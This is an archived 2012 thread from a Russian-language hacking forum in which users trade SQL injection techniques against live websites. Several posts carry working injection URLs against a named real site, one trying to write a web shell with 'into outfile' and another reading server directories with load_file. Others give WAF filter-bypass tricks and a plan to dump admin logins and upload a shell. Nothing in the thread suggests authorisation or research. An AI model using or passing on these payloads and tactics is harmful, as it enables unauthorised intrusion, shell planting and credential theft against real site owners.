ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

02.05.2012, 21:49
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от boortyhuhtyu
boortyhuhtyu said:
есть варианты раскрутить скуль если на серве ssl шифрование и ошибки отключены?
а чем ssl Может мешать твоей скуле?
ошибки отключены значит error based не катит, пробуй стандартный метод union select, Или посимвольно
|
|
|

02.05.2012, 21:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 225312
Репутация:
-6
|
|
Сообщение от Konqi
Konqi said:
а чем ssl Может мешать твоей скуле?
ошибки отключены значит error based не катит, пробуй стандартный метод union select, Или посимвольно
ну я впринцепи хотел услышать ответ только о ssl.спасибо ;_)
|
|
|
|

03.05.2012, 16:54
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме: 58401
Репутация:
0
|
|
посоны, нид хелп. наглухо фильтруется union, select, from. любое наличие одного из операторов приводит к редиректу, урл кодирование не помогло, нормализации нет (uni/**/on), POST фильтруется. хз что можно ещё придумать, но придумать нужно кровь из носа.
|
|
|

03.05.2012, 17:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 103014
Репутация:
76
|
|
Сообщение от d1v
d1v said:
посоны, нид хелп. наглухо фильтруется union, select, from. любое наличие одного из операторов приводит к редиректу, урл кодирование не помогло, нормализации нет (uni/**/on), POST фильтруется. хз что можно ещё придумать, но придумать нужно кровь из носа.
Обычно, когда я натыкаюсь на всякие редиректы, а также отданные сервером странички типа "Not Acceptable" и "Method Not Implemented" балуюсь с материалами из этой методички. Ну и нужно помнить про /*!sql-code*/ и /*!12345sql-code*/ Возможно, поможет.
|
|
|
|

03.05.2012, 17:28
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме: 58401
Репутация:
0
|
|
Сообщение от Га-Ноцри
Га-Ноцри said:
Обычно, когда я натыкаюсь на всякие редиректы, а также отданные сервером странички типа "Not Acceptable" и "Method Not Implemented" балуюсь с материалами из
этой методички.
Ну и нужно помнить про /*!sql-code*/ и /*!12345sql-code*/ Возможно, поможет.
я ведь написал - ЛЮБОЕ наличие оператора приводит к редиректу. все тривиальные методы испробованы.
|
|
|

03.05.2012, 17:32
|
|
Guest
Сообщений: n/a
Провел на форуме: 103014
Репутация:
76
|
|
Сообщение от d1v
d1v said:
я ведь написал - ЛЮБОЕ наличие оператор приводит к редиректу. все тривиальные методы испробованы.
Ну, я же не телепат и не могу знать, что конкретно вы использовали. Просто привел справочный материал, в котором довольно полно собраны все, как вы выразились, тривиальные методы. Ведь вполне возможно, вы что-то могли и упустить. В любом случае, я всего лишь хотел помочь. Удачи в вашем мозговом штурме.
|
|
|
|

04.05.2012, 16:19
|
|
Новичок
Регистрация: 08.05.2009
Сообщений: 8
Провел на форуме: 49568
Репутация:
1
|
|
Пациент:
Fiile_priv Y + доступ к PhpInfo.
Пробовал залить мини-шелл след образом:
Сообщение от None
http://www.aviel.ru/txt/new.php?id=32270-9.999+union+select+1,'',3,4,5,6,7,8,9,10,11+from+m ysql.user+into+outfile+'/usr/local/www/aviel/www/txt/images/s.php'--
Выдает ошибку:
Сообщение от None
К сожалению, запрошеннaя Вами статья в настоящее время недоступна.
ЧТо можно с ним сделать?
P.S Если у кого-то есть время, то напишите плиз в ЛС, чтобы разобрать этот пример.
P.S1 эх, первый шелл был так близок =((...
|
|
|

04.05.2012, 16:47
|
|
Guest
Сообщений: n/a
Провел на форуме: 195266
Репутация:
53
|
|
Видимо вообще нету никуда прав на запись. Ищи админки от сайта/поддоменов, ищи пути до корней этих поддоменов, ищи настройки подключения к бд и таблицы с полями для авторизации, дампь лог/пас, заходи в админку и лей шел.
|
|
|
|

04.05.2012, 18:02
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме: 11937
Репутация:
0
|
|
skier529, у тебя там фряха стоит, поэтому можешь читать содержимое папки, а не только файла, потому пробуй админку посмотреть ну и тд и тп...
Пример:
Код:
Code:
http://www.aviel[antigoogle]ru/txt/new.php?id=32270-9.999+union+select+1,load_file('/usr/local/www/aviel/www')3,4,5,6,7,8,9,10,11+from+mysql.user+--+
|
|
|

04.05.2012, 20:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 3318
Репутация:
0
|
|
как получить список пользователей wordpress?без админки
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|